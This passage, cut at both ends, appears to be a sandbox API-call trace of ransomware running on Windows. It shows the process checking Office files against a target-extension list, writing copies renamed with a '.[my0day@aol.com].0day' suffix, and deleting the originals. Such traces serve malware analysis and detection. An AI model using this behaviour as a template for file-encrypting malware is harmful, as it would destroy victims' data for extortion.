lpNewFilePointer=0x0) returned 1 [0037.650] WriteFile (in: hFile=0x1c4, lpBuffer=0x3f7a0a8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2b1fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f7a0a8*, lpNumberOfBytesWritten=0x2b1fc88*=0x40000, lpOverlapped=0x0) returned 1 [0037.652] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x15a3ff, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fc7c | out: lpNewFilePointer=0x0) returned 1 [0037.652] WriteFile (in: hFile=0x1c4, lpBuffer=0x3f7a0a8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2b1fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f7a0a8*, lpNumberOfBytesWritten=0x2b1fc88*=0x40000, lpOverlapped=0x0) returned 1 [0037.654] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3f7a0a8 | out: hHeap=0x5f0000) returned 1 [0037.654] CloseHandle (hObject=0x1c4) returned 1 [0038.328] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ADO210.CHM.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0038.328] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ADO210.CHM") returned 71 [0038.328] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ADO210.CHM") returned 71 [0038.328] lstrlenW (lpString=".doc") returned 4 [0038.329] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1 [0038.329] lstrlenW (lpString=".docx") returned 5 [0038.329] lstrcmpiW (lpString1=".docx", lpString2="0.CHM") returned -1 [0038.329] lstrlenW (lpString=".pdf") returned 4 [0038.329] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1 [0038.329] lstrlenW (lpString=".xls") returned 4 [0038.329] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1 [0038.329] lstrlenW (lpString=".xlsx") returned 5 [0038.329] lstrcmpiW (lpString1=".xlsx", lpString2="0.CHM") returned -1 [0038.329] lstrlenW (lpString=".ppt") returned 4 [0038.329] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1 [0038.329] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ADO210.CHM") returned 71 [0038.329] lstrlenW (lpString=".zip") returned 4 [0038.329] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1 [0038.329] lstrlenW (lpString=".rar") returned 4 [0038.329] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1 [0038.329] lstrlenW (lpString=".bz2") returned 4 [0038.329] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1 [0038.329] lstrlenW (lpString=".7z") returned 3 [0038.329] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1 [0038.329] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ADO210.CHM") returned 71 [0038.329] lstrlenW (lpString=".dbf") returned 4 [0038.329] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1 [0038.329] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ADO210.CHM") returned 71 [0038.329] lstrlenW (lpString=".1cd") returned 4 [0038.329] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1 [0038.329] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ADO210.CHM") returned 71 [0038.329] lstrlenW (lpString=".jpg") returned 4 [0038.329] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1 [0038.329] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ADO210.CHM") returned 71 [0038.329] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ADO210.CHM") returned 71 [0038.329] lstrlenW (lpString=".doc") returned 4 [0038.329] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1 [0038.330] lstrlenW (lpString=".docx") returned 5 [0038.330] lstrcmpiW (lpString1=".docx", lpString2="0.CHM") returned -1 [0038.330] lstrlenW (lpString=".pdf") returned 4 [0038.330] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1 [0038.330] lstrlenW (lpString=".xls") returned 4 [0038.330] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1 [0038.330] lstrlenW (lpString=".xlsx") returned 5 [0038.330] lstrcmpiW (lpString1=".xlsx", lpString2="0.CHM") returned -1 [0038.330] lstrlenW (lpString=".ppt") returned 4 [0038.330] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1 [0038.330] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ADO210.CHM") returned 71 [0038.330] lstrlenW (lpString=".zip") returned 4 [0038.330] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1 [0038.330] lstrlenW (lpString=".rar") returned 4 [0038.330] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1 [0038.330] lstrlenW (lpString=".bz2") returned 4 [0038.330] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1 [0038.330] lstrlenW (lpString=".7z") returned 3 [0038.330] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1 [0038.330] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ADO210.CHM") returned 71 [0038.330] lstrlenW (lpString=".dbf") returned 4 [0038.330] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1 [0038.330] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ADO210.CHM") returned 71 [0038.330] lstrlenW (lpString=".1cd") returned 4 [0038.330] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1 [0038.330] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ADO210.CHM") returned 71 [0038.330] lstrlenW (lpString=".jpg") returned 4 [0038.330] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1 [0038.330] lstrcmpiW (lpString1=".XML", lpString2=".0day") returned 1 [0038.331] lstrlenW (lpString="BRANDING.XML") returned 12 [0038.331] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8 [0038.799] GetFileSizeEx (in: hFile=0x1d8, lpFileSize=0x2b1ff1c | out: lpFileSize=0x2b1ff1c*=596341) returned 1 [0038.799] CloseHandle (hObject=0x1d8) returned 1 [0038.799] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.xml")) returned 0x20 [0038.799] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.xml.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0038.800] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8 [0038.800] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0038.800] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0038.800] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.xml.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0038.800] GetLastError () returned 0x0 [0038.800] ReadFile (in: hFile=0x1d8, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x91975, lpOverlapped=0x0) returned 1 [0038.814] WriteFile (in: hFile=0x1f4, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0x91980, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0x91980, lpOverlapped=0x0) returned 1 [0038.824] ReadFile (in: hFile=0x1d8, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x0, lpOverlapped=0x0) returned 1 [0038.824] WriteFile (in: hFile=0x1f4, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xec, lpOverlapped=0x0) returned 1 [0038.824] SetEndOfFile (hFile=0x1f4) returned 1 [0038.825] CloseHandle (hObject=0x1f4) returned 1 [0038.829] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0038.830] SetEndOfFile (hFile=0x1d8) returned 1 [0038.834] CloseHandle (hObject=0x1d8) returned 1 [0038.834] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0038.835] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.xml")) returned 1 [0038.835] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML") returned 105 [0038.835] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML") returned 105 [0038.835] lstrlenW (lpString=".doc") returned 4 [0038.835] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0038.835] lstrlenW (lpString=".docx") returned 5 [0038.835] lstrcmpiW (lpString1=".docx", lpString2="G.XML") returned -1 [0038.835] lstrlenW (lpString=".pdf") returned 4 [0038.835] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0038.835] lstrlenW (lpString=".xls") returned 4 [0038.835] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0038.835] lstrlenW (lpString=".xlsx") returned 5 [0038.835] lstrcmpiW (lpString1=".xlsx", lpString2="G.XML") returned -1 [0038.835] lstrlenW (lpString=".ppt") returned 4 [0038.835] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0038.835] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML") returned 105 [0038.835] lstrlenW (lpString=".zip") returned 4 [0038.835] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0038.835] lstrlenW (lpString=".rar") returned 4 [0038.835] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0038.835] lstrlenW (lpString=".bz2") returned 4 [0038.835] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0038.836] lstrlenW (lpString=".7z") returned 3 [0038.836] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0038.836] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML") returned 105 [0038.836] lstrlenW (lpString=".dbf") returned 4 [0038.836] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0038.836] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML") returned 105 [0038.836] lstrlenW (lpString=".1cd") returned 4 [0038.836] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0038.836] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML") returned 105 [0038.836] lstrlenW (lpString=".jpg") returned 4 [0038.836] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0038.836] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML") returned 105 [0038.836] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML") returned 105 [0038.836] lstrlenW (lpString=".doc") returned 4 [0038.836] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0038.836] lstrlenW (lpString=".docx") returned 5 [0038.836] lstrcmpiW (lpString1=".docx", lpString2="G.XML") returned -1 [0038.836] lstrlenW (lpString=".pdf") returned 4 [0038.836] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0038.836] lstrlenW (lpString=".xls") returned 4 [0038.836] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0038.836] lstrlenW (lpString=".xlsx") returned 5 [0038.836] lstrcmpiW (lpString1=".xlsx", lpString2="G.XML") returned -1 [0038.836] lstrlenW (lpString=".ppt") returned 4 [0038.836] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0038.836] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML") returned 105 [0038.836] lstrlenW (lpString=".zip") returned 4 [0038.836] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0038.836] lstrlenW (lpString=".rar") returned 4 [0038.836] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0038.836] lstrlenW (lpString=".bz2") returned 4 [0038.836] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0038.836] lstrlenW (lpString=".7z") returned 3 [0038.837] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0038.837] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML") returned 105 [0038.837] lstrlenW (lpString=".dbf") returned 4 [0038.837] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0038.837] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML") returned 105 [0038.837] lstrlenW (lpString=".1cd") returned 4 [0038.837] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0038.837] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML") returned 105 [0038.837] lstrlenW (lpString=".jpg") returned 4 [0038.837] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0038.837] lstrcmpiW (lpString1=".XML", lpString2=".0day") returned 1 [0038.837] lstrlenW (lpString="OfficeMUI.XML") returned 13 [0038.837] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\officemui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0039.051] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x2b1ff1c | out: lpFileSize=0x2b1ff1c*=5557) returned 1 [0039.059] CloseHandle (hObject=0x198) returned 1 [0039.059] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\officemui.xml")) returned 0x20 [0039.060] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\officemui.xml.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0039.060] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\officemui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0039.060] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0039.060] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0039.060] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\officemui.xml.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0039.529] GetLastError () returned 0x0 [0039.529] ReadFile (in: hFile=0x198, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x15b5, lpOverlapped=0x0) returned 1 [0039.576] WriteFile (in: hFile=0x1f4, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0x15c0, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0x15c0, lpOverlapped=0x0) returned 1 [0039.577] ReadFile (in: hFile=0x198, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x0, lpOverlapped=0x0) returned 1 [0039.577] WriteFile (in: hFile=0x1f4, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xee, lpOverlapped=0x0) returned 1 [0039.577] SetEndOfFile (hFile=0x1f4) returned 1 [0039.577] CloseHandle (hObject=0x1f4) returned 1 [0039.578] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0039.578] SetEndOfFile (hFile=0x198) returned 1 [0039.578] CloseHandle (hObject=0x198) returned 1 [0039.579] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0039.579] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\officemui.xml")) returned 1 [0039.579] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML") returned 106 [0039.579] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML") returned 106 [0039.579] lstrlenW (lpString=".doc") returned 4 [0039.579] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0039.579] lstrlenW (lpString=".docx") returned 5 [0039.579] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0039.579] lstrlenW (lpString=".pdf") returned 4 [0039.579] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0039.579] lstrlenW (lpString=".xls") returned 4 [0039.579] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0039.579] lstrlenW (lpString=".xlsx") returned 5 [0039.579] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0039.579] lstrlenW (lpString=".ppt") returned 4 [0039.579] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0039.579] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML") returned 106 [0039.579] lstrlenW (lpString=".zip") returned 4 [0039.579] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0039.579] lstrlenW (lpString=".rar") returned 4 [0039.579] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0039.580] lstrlenW (lpString=".bz2") returned 4 [0039.580] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0039.580] lstrlenW (lpString=".7z") returned 3 [0039.580] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0039.580] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML") returned 106 [0039.580] lstrlenW (lpString=".dbf") returned 4 [0039.580] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0039.580] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML") returned 106 [0039.580] lstrlenW (lpString=".1cd") returned 4 [0039.580] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0039.580] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML") returned 106 [0039.580] lstrlenW (lpString=".jpg") returned 4 [0039.580] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0039.580] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML") returned 106 [0039.580] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML") returned 106 [0039.580] lstrlenW (lpString=".doc") returned 4 [0039.580] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0039.580] lstrlenW (lpString=".docx") returned 5 [0039.580] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0039.580] lstrlenW (lpString=".pdf") returned 4 [0039.580] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0039.580] lstrlenW (lpString=".xls") returned 4 [0039.580] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0039.580] lstrlenW (lpString=".xlsx") returned 5 [0039.580] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0039.580] lstrlenW (lpString=".ppt") returned 4 [0039.580] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0039.580] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML") returned 106 [0039.580] lstrlenW (lpString=".zip") returned 4 [0039.580] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0039.580] lstrlenW (lpString=".rar") returned 4 [0039.580] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0039.580] lstrlenW (lpString=".bz2") returned 4 [0039.580] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0039.581] lstrlenW (lpString=".7z") returned 3 [0039.581] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0039.581] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML") returned 106 [0039.581] lstrlenW (lpString=".dbf") returned 4 [0039.581] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0039.581] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML") returned 106 [0039.581] lstrlenW (lpString=".1cd") returned 4 [0039.581] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0039.581] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML") returned 106 [0039.581] lstrlenW (lpString=".jpg") returned 4 [0039.581] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0039.581] lstrcmpiW (lpString1=".XML", lpString2=".0day") returned 1 [0039.581] lstrlenW (lpString="Office32WW.XML") returned 14 [0039.581] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.ww\\office32ww.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0039.581] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x2b1ff1c | out: lpFileSize=0x2b1ff1c*=4274) returned 1 [0039.581] CloseHandle (hObject=0x198) returned 1 [0039.581] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.ww\\office32ww.xml")) returned 0x20 [0039.581] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.ww\\office32ww.xml.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0039.582] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.ww\\office32ww.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0039.582] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0039.582] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0039.582] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.ww\\office32ww.xml.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, 